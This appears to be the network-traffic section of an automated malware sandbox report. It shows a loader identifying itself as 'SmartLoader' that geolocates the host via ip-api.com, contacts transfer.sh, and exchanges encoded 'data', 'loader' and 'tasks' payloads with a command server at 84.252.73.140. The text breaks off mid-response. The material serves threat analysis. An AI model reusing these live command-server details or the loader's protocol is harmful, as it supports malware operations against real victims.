Mar 24, 2023 07:59:28.007582903 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.007621050 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.008833885 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.008862019 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.008882046 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.008896112 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.008913994 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.008935928 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.008951902 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.009118080 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.009145975 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.009232998 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.037763119 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.037787914 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.037899971 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.037920952 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.037986040 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.038007021 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.038237095 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.038369894 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.038654089 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.038661003 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.038743019 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.038783073 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.038826942 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.039045095 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.065895081 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.065912962 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.065924883 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.066442966 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.066459894 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.066576004 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.066658974 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.066800117 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.067064047 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.067194939 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.067347050 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.067498922 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.067661047 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.067840099 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.068218946 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.068336010 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.094347954 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.094423056 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.094475031 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.094523907 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.094660997 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.094813108 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.095021009 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.095166922 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.095429897 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.095482111 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.095655918 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.095948935 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.096067905 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.096074104 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.096174002 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.096254110 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.096424103 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.096472979 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.096662998 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.096831083 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.097043991 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.097181082 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.097482920 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.097596884 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.124151945 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.124321938 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.124370098 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.124413967 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.124627113 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.124779940 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.124866009 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.125102997 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.125261068 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.125426054 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.125617027 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.125732899 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.125936985 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.126079082 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.126327991 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.126422882 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.126631975 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.126777887 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.126924038 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.127091885 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.127295971 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.127475023 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.127613068 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.127763987 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.127768040 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.127897978 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.128127098 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.128305912 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.128339052 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.128515005 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.128667116 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.128855944 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.128992081 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.129262924 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.129342079 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.129590034 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.130249023 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.155659914 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.155689955 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.155766964 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.155956030 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.156131983 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.156188965 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.156270981 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.156290054 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.156466961 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.156616926 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.156744957 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.157164097 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.157300949 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.157692909 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.157922983 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.157943964 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.158268929 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.158600092 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.158612967 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.158771038 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.159193993 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.159290075 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.184281111 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.184319019 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.184343100 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.184420109 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.184636116 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.184745073 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.184946060 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.185172081 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.185551882 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.185691118 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.186839104 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.186935902 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.187026978 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.187165976 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.187313080 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.187501907 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.187642097 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.187859058 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.188035965 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.188441992 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.188760996 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.188862085 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.213677883 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.213722944 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.213749886 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.213805914 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.213967085 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.214155912 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.214525938 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.214667082 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.214858055 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.215037107 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.215236902 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.215418100 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.215507984 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.215709925 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.216038942 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.216226101 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.216252089 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.216461897 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.216623068 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.216788054 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.217148066 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.217302084 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.217421055 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.217622042 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.217789888 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.218180895 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.218312025 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.218513966 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.218813896 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.218883038 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.219069958 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.219225883 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.219384909 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.220514059 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.248557091 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.248610020 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.248641968 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.248768091 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.249170065 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.249285936 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.249321938 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.251063108 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.276568890 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.305561066 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.308681965 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.336968899 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.457433939 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:29.017126083 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:29.045599937 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:29.107379913 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:29.135793924 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:29.269980907 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:29.273552895 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:29.301897049 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:29.302516937 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:29.330845118 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:29.457529068 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:30.777549982 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:49.820863008 CET	49713	80	192.168.2.6	144.76.136.153
Mar 24, 2023 07:59:49.821073055 CET	49711	80	192.168.2.6	84.252.73.140
Mar 24, 2023 07:59:49.843926907 CET	80	49713	144.76.136.153	192.168.2.6
Mar 24, 2023 07:59:49.881714106 CET	80	49711	84.252.73.140	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2023 07:58:00.114509106 CET	49448	53	192.168.2.6	8.8.8.8
Mar 24, 2023 07:58:00.150810957 CET	53	49448	8.8.8.8	192.168.2.6
Mar 24, 2023 07:58:00.676178932 CET	59082	53	192.168.2.6	8.8.8.8
Mar 24, 2023 07:58:00.696926117 CET	53	59082	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 24, 2023 07:58:00.114509106 CET	192.168.2.6	8.8.8.8	0xe36	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Mar 24, 2023 07:58:00.676178932 CET	192.168.2.6	8.8.8.8	0x4452	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 24, 2023 07:58:00.150810957 CET	8.8.8.8	192.168.2.6	0xe36	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Mar 24, 2023 07:58:00.696926117 CET	8.8.8.8	192.168.2.6	0x4452	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

transfer.sh

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49714	144.76.136.153	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49710	208.95.112.1	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
Mar 24, 2023 07:58:00.199429035 CET	98	OUT	GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1 Content-Type: application/json User-Agent: SmartLoader Host: ip-api.com
Mar 24, 2023 07:58:00.233262062 CET	98	IN	HTTP/1.1 200 OK Date: Fri, 24 Mar 2023 06:57:59 GMT Content-Type: application/json; charset=utf-8 Content-Length: 104 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 35 32 2e 34 30 22 7d Data Ascii: {"status":"success","countryCode":"CH","city":"Zurich","timezone":"Europe/Zurich","query":"84.17.52.40"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49711	84.252.73.140	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
Mar 24, 2023 07:58:00.361865044 CET	107	OUT	PUT /loader/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys HTTP/1.1 Content-Type: application/json User-Agent: SmartLoader Host: 84.252.73.140 Content-Length: 587 Cache-Control: no-cache Data Raw: 7b 22 64 61 74 61 22 3a 22 59 6a 4d 73 59 7a 59 73 59 7a 4d 73 59 32 49 73 5a 44 45 73 59 57 45 73 4f 57 4d 73 59 6d 49 73 59 6a 55 73 59 57 49 73 4f 44 55 73 4f 44 67 73 4e 6d 55 73 4f 54 51 73 59 7a 6b 73 59 57 45 73 59 6a 63 73 59 6a 59 73 59 54 6b 73 4f 54 6b 73 4e 6d 4d 73 59 6d 45 73 59 57 49 73 4e 6a 4d 73 4f 44 4d 73 4f 44 55 73 59 54 6b 73 4f 54 45 73 4f 47 51 73 4e 6a 59 73 59 54 49 73 4e 32 4d 73 4f 44 41 73 4f 54 67 73 4f 57 49 73 4f 57 4d 73 59 54 45 73 4e 32 49 73 4f 44 63 73 4f 47 59 73 59 6a 45 73 59 6a 41 73 4f 57 49 73 4f 47 4d 73 4f 47 55 73 4e 6a 49 73 4f 47 49 73 4f 44 4d 73 4f 47 4d 73 59 6d 45 73 4f 47 49 73 59 32 4d 73 59 54 55 73 5a 54 49 73 5a 44 63 73 59 54 49 73 59 7a 51 73 59 6a 55 73 5a 54 55 73 4f 54 59 73 4e 32 59 73 4e 6a 55 73 59 54 4d 73 4e 6a 6b 73 4e 32 55 73 4f 44 67 73 4f 44 67 73 5a 47 4d 73 5a 47 59 73 4f 57 51 73 59 7a 55 73 4f 54 51 73 5a 47 51 73 5a 54 55 73 59 6d 4d 73 59 7a 41 73 59 6a 59 73 4f 54 49 73 59 6a 6b 73 59 6a 4d 73 4e 7a 6b 73 5a 57 45 73 5a 47 45 73 59 32 55 73 59 54 67 73 5a 57 55 73 59 54 51 73 4e 6a 55 73 4f 44 51 73 4e 32 55 73 59 54 51 73 4f 54 41 73 4e 7a 55 73 4e 6a 55 73 59 54 41 73 4e 6a 55 73 4e 32 49 73 4f 44 63 73 4f 44 67 73 59 32 45 73 5a 47 49 73 59 57 51 73 59 7a 45 73 59 32 49 73 5a 57 45 73 5a 6a 41 73 4f 54 49 73 4f 57 45 73 4f 54 41 73 4e 54 4d 73 59 6a 63 73 59 57 45 73 59 7a 63 73 5a 6a 49 73 59 54 49 73 59 7a 4d 73 59 57 49 73 5a 54 63 73 5a 44 41 73 4f 54 41 73 59 6a 67 73 4e 7a 59 73 5a 54 63 73 59 7a 49 73 59 6a 51 73 4f 54 55 73 5a 54 67 73 59 54 59 73 59 6a 55 73 59 6d 4d 73 4f 57 59 73 59 57 4d 73 5a 54 45 73 59 57 45 73 59 7a 49 73 59 7a 63 73 5a 47 51 73 59 54 59 73 59 57 59 73 59 32 4d 73 59 6d 45 73 4f 54 59 73 59 6a 63 73 59 54 6b 3d 22 7d Data Ascii: {"data":"YjMsYzYsYzMsY2IsZDEsYWEsOWMsYmIsYjUsYWIsODUsODgsNmUsOTQsYzksYWEsYjcsYjYsYTksOTksNmMsYmEsYWIsNjMsODMsODUsYTksOTEsOGQsNjYsYTIsN2MsODAsOTgsOWIsOWMsYTEsN2IsODcsOGYsYjEsYjAsOWIsOGMsOGUsNjIsOGIsODMsOGMsYmEsOGIsY2MsYTUsZTIsZDcsYTIsYzQsYjUsZTUsOTYsN2YsNjUsYTMsNjksN2UsODgsODgsZGMsZGYsOWQsYzUsOTQsZGQsZTUsYmMsYzAsYjYsOTIsYjksYjMsNzksZWEsZGEsY2UsYTgsZWUsYTQsNjUsODQsN2UsYTQsOTAsNzUsNjUsYTAsNjUsN2IsODcsODgsY2EsZGIsYWQsYzEsY2IsZWEsZjAsOTIsOWEsOTAsNTMsYjcsYWEsYzcsZjIsYTIsYzMsYWIsZTcsZDAsOTAsYjgsNzYsZTcsYzIsYjQsOTUsZTgsYTYsYjUsYmMsOWYsYWMsZTEsYWEsYzIsYzcsZGQsYTYsYWYsY2MsYmEsOTYsYjcsYTk="}
Mar 24, 2023 07:58:00.624924898 CET	111	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 24 Mar 2023 06:58:00 GMT Content-Type: application/json Content-Length: 1372 Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UX4wikxjNepl%2F7cKXUBmOBZ12MeHXJq6oBm%2FS%2FFYKXD6NFSIkB%2F7HC905fXkDVGXTC7UNrnqLwQExd5mAJf0Uvep38uWJBOIEM28db3MJJwjpLmFGc%2F23yYMVyRu8hKb7Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 7acd05f0c97cb8e4-AMS alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 7b 22 6c 6f 61 64 65 72 22 3a 22 59 7a 49 73 4e 7a 6b 73 59 7a 51 73 5a 54 41 73 5a 47 4d 73 4f 54 6b 73 59 7a 59 73 59 32 45 73 5a 44 63 73 5a 47 49 73 59 6d 45 73 59 6d 51 73 59 57 51 73 4f 57 49 73 59 6a 67 73 59 54 59 73 59 7a 55 73 4f 57 49 73 4f 57 59 73 4f 44 6b 73 4e 6a 63 73 59 54 45 73 4f 44 63 73 4e 47 59 73 59 6a 45 73 59 7a 55 73 5a 54 63 73 59 7a 67 73 59 6a 6b 73 59 54 55 73 5a 47 4d 73 4e 54 6b 73 4f 44 45 73 4e 7a 63 73 4f 54 4d 73 4f 54 4d 73 4f 47 4d 73 4e 57 45 73 59 7a 55 73 59 6d 4d 73 5a 54 51 73 5a 44 67 73 59 32 45 73 59 7a 55 73 59 57 49 73 4f 54 55 73 4e 7a 59 73 4e 32 49 73 4e 7a 4d 73 5a 6a 51 73 4f 44 63 73 5a 47 51 73 4f 57 59 73 5a 54 49 73 59 32 4d 73 4e 47 59 73 4f 47 45 73 4e 7a 41 73 59 54 41 73 4f 47 45 73 4e 7a 4d 73 4e 54 41 73 4f 54 41 73 59 57 45 73 59 6d 49 73 59 6a 67 73 5a 44 59 73 5a 47 4d 73 5a 47 59 73 4e 57 45 73 4f 47 51 73 4e 7a 63 73 5a 47 55 73 5a 44 67 73 59 7a 45 73 59 32 45 73 59 57 51 73 59 57 45 73 4f 44 41 73 4e 6a 45 73 4e 7a 55 73 5a 57 51 73 59 7a 59 73 59 32 49 73 59 54 49 73 5a 47 45 73 5a 47 49 73 4e 47 59 73 4f 47 45 73 4e 7a 41 73 5a 57 55 73 4e 32 49 73 59 6d 49 73 4f 54 55 73 5a 54 59 73 59 57 49 73 4e 6a 6b 73 4f 54 45 73 4f 44 49 73 4f 44 6b 73 59 57 51 73 59 54 59 73 4e 7a 4d 73 59 6d 4d 73 5a 57 45 73 5a 54 6b 73 59 7a 51 73 59 7a 6b 73 4e 6a 67 73 4f 57 4d 73 59 6a 63 73 59 54 51 73 59 7a 67 73 5a 57 49 73 5a 44 63 73 59 32 55 73 4f 57 45 73 4f 54 63 73 4f 54 4d 73 4e 47 51 73 4e 7a 49 73 59 7a 4d 73 5a 54 63 73 59 6d 45 73 59 6d 49 73 59 54 55 73 5a 54 45 73 4e 54 6b 73 4f 44 45 73 4e 7a 63 73 59 7a 67 73 59 7a 67 73 5a 44 67 73 59 57 49 73 59 6a 67 73 5a 44 51 73 5a 6a 55 73 22 2c 22 74 61 73 6b 73 22 3a 22 59 54 49 73 5a 44 49 73 4f 44 51 73 5a 44 41 73 5a 44 41 73 4e 57 45 73 4f 47 51 73 4e 7a 63 73 59 57 51 73 59 54 67 73 4f 44 6b 73 4f 44 4d 73 4e 6a 67 73 4e 47 59 73 59 7a 41 73 59 57 45 73 59 7a 45 73 5a 54 51 73 4f 44 63 73 59 54 4d 73 4e 54 59 73 4f 54 63 73 59 32 59 73 59 54 45 73 59 7a 51 73 59 7a 41 73 5a 54 59 73 4f 54 Data Ascii: 